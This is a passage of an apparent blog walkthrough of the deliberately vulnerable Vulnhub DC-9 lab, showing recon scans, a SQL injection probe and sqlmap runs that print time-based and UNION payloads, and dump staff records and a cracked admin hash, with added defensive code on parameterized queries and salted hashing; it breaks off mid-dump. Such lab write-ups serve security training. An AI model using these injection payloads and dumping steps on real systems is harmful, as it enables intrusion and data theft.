Vulnhub Lab Practice Series: DC-9 Walkthrough

Disclaimer

This document is for learning and research only. Do not use the techniques or source code in this article for illegal purposes; the author bears no responsibility for any negative consequences caused by anyone.

Contents

  • Disclaimer
  • Preface
  • 1. Environment setup
  • 2. Information gathering
    • 2.1 Host discovery
    • 2.2 Port scanning
    • 2.3 Fingerprinting
    • 2.4 Directory scanning
      • 2.4.1 Directory scanning with Nikto
      • 2.4.2 Directory scanning with dirsearch
    • 2.5 Vulnerability discovery
      • 2.5.1 Browsing the pages
  • 3. Penetration testing
    • 3.1 SQL injection
      • 3.1.1 Listing the databases
      • 3.1.2 Listing the tables in each database
        • 3.1.2.1 Tables in the Staff database
        • 3.1.2.2 Tables in the users database
      • 3.1.3 Dumping table contents
        • 3.1.3.1 StaffDetails table (Staff database)
        • 3.1.3.2 Users table (Staff database)
        • 3.1.3.3 UserDetails table (users database)
    • 3.2 LFI (local file inclusion)
      • 3.2.1 Login
      • 3.2.2 File inclusion vulnerability
      • 3.2.3 Port knocking service
    • 3.3 SSH
      • 3.3.1 Opening SSH with nc
      • 3.3.2 Port scanning
      • 3.3.3 hydra
        • 3.3.3.1 Building the wordlists
        • 3.3.3.2 Brute-forcing SSH with hydra
    • 3.4 SSH login
      • 3.4.1 chandlerb
      • 3.4.2 joeyt
      • 3.4.3 janitor
      • 3.4.4 fredf
    • 3.5 Linux privilege escalation
      • 3.5.1 Generating a password hash on Kali
      • 3.5.2 Writing the password into /etc/passwd
      • 3.5.3 Getting the flag
        • 3.5.3.1 Switching to the admin user
        • 3.5.3.2 Locating the flag file
        • 3.5.3.3 Reading the flag file
  • Summary
  • References


Preface

Today's target is the DC-9 machine.

Vulnhub is a platform that provides lab environments for all kinds of vulnerabilities; most of them are ready-made virtual machine images with several vulnerabilities designed in. This article walks through a penetration test of the DC-9 machine, covering an nmap scan, directory scanning (nikto / dirsearch / dirb), SQL injection, wfuzz brute forcing, an LFI file-inclusion vulnerability, SSH brute forcing (knockd / nmap / netcat / Hydra), Linux privilege escalation (openssl) and finally reading the flag.

Description (from the Vulnhub page)
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again.
But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.


1. Environment setup

Lab information

Official link: https://www.vulnhub.com/entry/dc-9,412/
Release date: 29 December 2019
Size: 700 MB
Author: DCAU
Series: DC
Difficulty: ★★☆☆☆

For the penetration-testing environment setup, refer to the author's earlier DC-2 post; it is not repeated here:

Vulnhub Lab Practice Series: DC-2 Walkthrough: https://editor.csdn.net/md/?articleId=139026849


2. Information gathering

2.1 Host discovery

┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1	00:50:56:c0:00:08	VMware, Inc.
192.168.6.2	00:50:56:f5:7b:9f	VMware, Inc.
192.168.6.145	00:0c:29:c1:5e:37	VMware, Inc.
192.168.6.254	00:50:56:e9:88:8e	VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 4 responded

Target host details:
IP address: 192.168.6.145
MAC address: 00:0c:29:c1:5e:37

2.2 Port scanning

┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 06:35 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:C1:5E:37 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Scan results:
Port 22: SSH (filtered)
Port 80: HTTP

Filtered means nmap received no reply at all for port 22 rather than a RST, which usually indicates a firewall rule dropping the probes; the knockd configuration found in section 3.2.3 explains why.

2.3 Fingerprinting

┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.145
WhatWeb report for http://192.168.6.145
Status    : 200 OK
Title     : Example.com - Staff Details - Welcome
IP        : 192.168.6.145
Country   : RESERVED, ZZ

Summary   : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

Detected Plugins:
[ Apache ]
    The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

    Version      : 2.4.38 (from HTTP Server Header)
    Google Dorks: (3)
    Website     : http://httpd.apache.org/

[ HTML5 ]
    HTML version 5, detected by the doctype declaration

[ HTTPServer ]
    HTTP server header string. This plugin also attempts to identify the operating system from the server header.

    OS           : Debian Linux
    String       : Apache/2.4.38 (Debian) (from server string)

HTTP Headers:
    HTTP/1.1 200 OK
    Date: Sat, 01 Jun 2024 10:39:45 GMT
    Server: Apache/2.4.38 (Debian)
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 402
    Connection: close
    Content-Type: text/html; charset=UTF-8

Result:
Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]

2.4 Directory scanning

2.4.1 Directory scanning with Nikto

┌──(root㉿kali)-[/home/kali]
└─# nikto -host 192.168.6.145
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.6.145
+ Target Hostname:    192.168.6.145
+ Target Port:        80
+ Start Time:         2024-06-01 06:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2024-06-01 06:42:21 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

2.4.2 Directory scanning with dirsearch

┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.145 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481

Output File: /home/kali/reports/_192.168.6.145/_24-06-01_06-43-35.txt

Target: http://192.168.6.145/

[06:43:35] Starting: 
[06:43:40] 403 -  278B  - /.ht_wsr.txt                                      
[06:43:40] 403 -  278B  - /.htaccess.sample
[06:43:40] 403 -  278B  - /.htaccess.bak1
[06:43:40] 403 -  278B  - /.htaccess.save                                   
[06:43:40] 403 -  278B  - /.htaccess_orig
[06:43:40] 403 -  278B  - /.htaccess_sc
[06:43:40] 403 -  278B  - /.htaccess.orig
[06:43:40] 403 -  278B  - /.htaccessBAK
[06:43:40] 403 -  278B  - /.html                                            
[06:43:40] 403 -  278B  - /.htm                                             
[06:43:40] 403 -  278B  - /.htaccessOLD2                                    
[06:43:40] 403 -  278B  - /.htpasswd_test                                   
[06:43:40] 403 -  278B  - /.htaccessOLD                                     
[06:43:40] 403 -  278B  - /.htaccess_extra                                  
[06:43:40] 403 -  278B  - /.htpasswds                                       
[06:43:40] 403 -  278B  - /.httr-oauth                                      
[06:43:42] 403 -  278B  - /.php                                             
[06:44:07] 200 -    0B  - /config.php                                       
[06:44:10] 301 -  312B  - /css  ->  http://192.168.6.145/css/               
[06:44:23] 200 -  407B  - /includes/                                        
[06:44:23] 301 -  317B  - /includes  ->  http://192.168.6.145/includes/     
[06:44:32] 200 -  494B  - /manage.php                                       
[06:44:54] 403 -  278B  - /server-status/                                   
[06:44:53] 403 -  278B  - /server-status

Task Completed

The scan finishes with a few noteworthy paths:
http://192.168.6.145/includes/
http://192.168.6.145/manage.php

Note that the unquoted -e * in the command was expanded by the shell: the banner reports "Extensions: 39772.zip", a file from the working directory, instead of an extension list. Quote the argument (-e '*') or name the extensions explicitly (for example -e php,txt) so dirsearch receives what was intended.

2.5 Vulnerability discovery

2.5.1 Browsing the pages

Management page: http://192.168.6.145/manage.php
(screenshot: management page)
Site root: http://192.168.6.145
(screenshot: site root)
Home page: http://192.168.6.145/index.php
(screenshot: home page)
Display page: http://192.168.6.145/display.php
(screenshot: display page)
Search page: http://192.168.6.145/search.php
(screenshot: search page)

Analysis:
On the search page, enter the test payload ' or 1=1 --+ and click Submit.
The response is as follows:
(screenshot: results.php)
All 17 user records are returned, so this page (http://192.168.6.145/search.php) is vulnerable to SQL injection.
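To see why a single quote in that probe returns every row, here is an added example (not code from the original post or from the DC-9 lab) that rebuilds the search in Python over an in-memory SQLite table with constructed rows. One function splices the search term into the SQL text, which is assumed to be what the vulnerable results.php does; the other binds it as a parameter, which is the fix. The column names are assumed from the later dump; the rows are made up.

```python
import sqlite3

# Constructed sample rows standing in for the target's StaffDetails table;
# the names mirror the dump shown later, the table is otherwise made up.
STAFF = [
    (1, "Mary", "Moe", "marym@example.com"),
    (2, "Julie", "Dooley", "julied@example.com"),
    (3, "Fred", "Flintstone", "fredf@example.com"),
]


def make_db():
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE StaffDetails "
        "(id INTEGER, firstname TEXT, lastname TEXT, email TEXT)"
    )
    conn.executemany("INSERT INTO StaffDetails VALUES (?, ?, ?, ?)", STAFF)
    return conn


def search_vulnerable(conn, term):
    """String-concatenated query (assumed to be what results.php does).
    The search term is spliced into the SQL text, so a quote character
    ends the string literal and the rest of the input is parsed as SQL."""
    sql = (
        "SELECT id, firstname, lastname, email FROM StaffDetails "
        "WHERE firstname = '" + term + "' OR lastname = '" + term + "'"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn, term):
    """Parameterized query: the term is bound as a value by the driver and
    is never interpreted as SQL, whatever characters it contains."""
    sql = (
        "SELECT id, firstname, lastname, email FROM StaffDetails "
        "WHERE firstname = ? OR lastname = ?"
    )
    return conn.execute(sql, (term, term)).fetchall()


def compare(payload="' or 1=1 -- "):
    """Run the same probe through both versions and return the row counts.
    With the vulnerable query the payload turns the WHERE clause into
    firstname = '' or 1=1 (the rest is commented out), so every row comes
    back; the parameterized query looks for a name that literally equals
    the payload and finds none."""
    conn = make_db()
    return {
        "vulnerable_normal": len(search_vulnerable(conn, "Fred")),
        "vulnerable_payload": len(search_vulnerable(conn, payload)),
        "parameterized_normal": len(search_parameterized(conn, "Fred")),
        "parameterized_payload": len(search_parameterized(conn, payload)),
    }


if __name__ == "__main__":
    print(compare())
```

The same contrast holds for MySQL/MariaDB behind the real page; the only difference is that MySQL requires whitespace after the `--` comment marker, which is why the probe on the page ends in `--+` (the `+` is a URL-encoded space).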


3. Penetration testing

3.1 SQL injection

3.1.1 Listing the databases

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:15:05 /2024-06-01/

[07:15:06] [INFO] testing connection to the target URL
[07:15:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:15:06] [INFO] testing if the target URL content is stable
[07:15:06] [INFO] target URL content is stable
[07:15:06] [INFO] testing if POST parameter 'search' is dynamic
[07:15:07] [WARNING] POST parameter 'search' does not appear to be dynamic
[07:15:07] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[07:15:07] [INFO] testing for SQL injection on POST parameter 'search'
[07:15:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:15:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:15:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:15:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:15:07] [INFO] testing 'Generic inline queries'
[07:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:15:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:15:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:18:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:18:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:18:50] [INFO] target URL appears to be UNION injectable with 6 columns
[07:18:50] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:18:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:18:53] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users

[07:18:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:18:53 /2024-06-01/

The run finishes with the database list:
available databases [3]:
[*] information_schema
[*] Staff
[*] users

3.1.2 Listing the tables in each database

3.1.2.1 Tables in the Staff database

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:31:48 /2024-06-01/

[07:31:48] [INFO] resuming back-end DBMS 'mysql' 
[07:31:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:31:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:31:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

[07:31:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:31:48 /2024-06-01/

Enumerating the Staff database yields 2 tables:
StaffDetails
Users

3.1.2.2 Tables in the users database

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users --tables
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:34:48 /2024-06-01/

[07:34:48] [INFO] resuming back-end DBMS 'mysql' 
[07:34:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:34:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:34:48] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+

[07:34:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:34:48 /2024-06-01/

Enumerating the users database yields 1 table:
UserDetails

3.1.3 Dumping table contents

3.1.3.1 StaffDetails table (Staff database)

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T StaffDetails --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.3#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:38:15 /2024-06-01/

[07:38:16] [INFO] resuming back-end DBMS 'mysql' 
[07:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:38:16] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[07:38:16] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1  | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 2  | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 3  | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 4  | barneyr@example.com   | 324643564      | Rubble     | 2019-05-01 17:32:00 | Barney    | Help Desk                     |
| 5  | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 6  | jerrym@example.com    | 24342654756    | Mouse      | 2019-05-01 17:32:00 | Jerry     | Stores                        |
| 7  | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 8  | bettyr@example.com    | 90239724378    | Rubble     | 2019-05-01 17:32:00 | Betty     | Junior Accounts               |
| 9  | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 10 | joeyt@example.com     | 232131654      | Tribbiani  | 2019-05-01 17:32:00 | Joey      | Janitor                       |
| 11 | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 12 | rossg@example.com     | 6549638203     | Geller     | 2019-05-01 17:32:00 | Ross      | Instructor                    |
| 13 | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 14 | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
| 15 | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 16 | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 17 | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+

[07:38:17] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/StaffDetails.csv'
[07:38:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:38:17 /2024-06-01/

The dump above lists every record of the StaffDetails table in the Staff database (email, phone, lastname, firstname, position).

3.1.3.2 Users table (Staff database)

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T Users --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:45:38 /2024-06-01/

[07:45:38] [INFO] resuming back-end DBMS 'mysql' 
[07:45:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:45:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:45:38] [INFO] fetching columns for table 'Users' in database 'Staff'
[07:45:38] [INFO] fetching entries for table 'Users' in database 'Staff'
[07:45:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:45:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapamxv6dki591911/sqlmaphashes-btocsf9y.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[07:45:44] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [07:45:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [07:45:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:45:47] [INFO] starting 8 processes 
[07:46:13] [WARNING] no clear password(s) found                                                                                                                                                                                   
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+

[07:46:13] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/Users.csv'
[07:46:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'

[*] ending @ 07:46:13 /2024-06-01/

The dump above shows the Users table of the Staff database, which holds a single record:

Username    Password
admin       856f5de590ef37314e7c3bdf6f8a66dc (transorbital1)

The password value is 32 hex characters long, so it is most likely an unsalted MD5 hash. sqlmap's built-in dictionary attack did not crack it, but an online MD5 lookup site returns the plaintext:
Password: transorbital1
(screenshot: MD5 lookup)
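Why an online site can "decrypt" that value is worth making concrete. The following is an added example, not part of the original post or the DC-9 application: it reproduces the unsalted MD5 storage that the Users table uses, the 32-hex-character tell used above, and beside it a salted, iterated password hash from Python's standard library (PBKDF2-HMAC-SHA256, with a storage format and iteration count chosen for this example), which is what a login table should hold instead.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # PBKDF2 work factor chosen for the example; tune for production


def md5_unsalted(password):
    """How Staff.Users stores its password: a single unsalted MD5 digest.
    The same password always yields the same digest, which is exactly what
    a precomputed lookup table (an online 'MD5 decrypt' site) relies on."""
    return hashlib.md5(password.encode()).hexdigest()


def looks_like_md5(value):
    """The tell used in the walkthrough: exactly 32 hexadecimal characters."""
    return len(value) == 32 and all(c in "0123456789abcdef" for c in value.lower())


def hash_password(password, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256 from the standard library.
    Stored as algorithm$iterations$salt$hash so the verifier can read the
    parameters back; a fresh 16-byte salt makes every stored value unique,
    so a lookup table built for one user is useless for any other."""
    if salt is None:
        salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count and compare in
    constant time; returns False for a malformed or foreign record such as
    a bare MD5 string."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(md5_unsalted("abc"))       # identical on every run: lookup-table friendly
    print(hash_password("example"))  # different on every run: salted
```

Run it twice and the MD5 line never changes while the PBKDF2 line always does; that difference is the whole reason the admin hash could be looked up rather than cracked.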

3.1.3.3 UserDetails table (users database)

┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users -T UserDetails --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:00:17 /2024-06-01/

[08:00:18] [INFO] resuming back-end DBMS 'mysql' 
[08:00:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWV

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
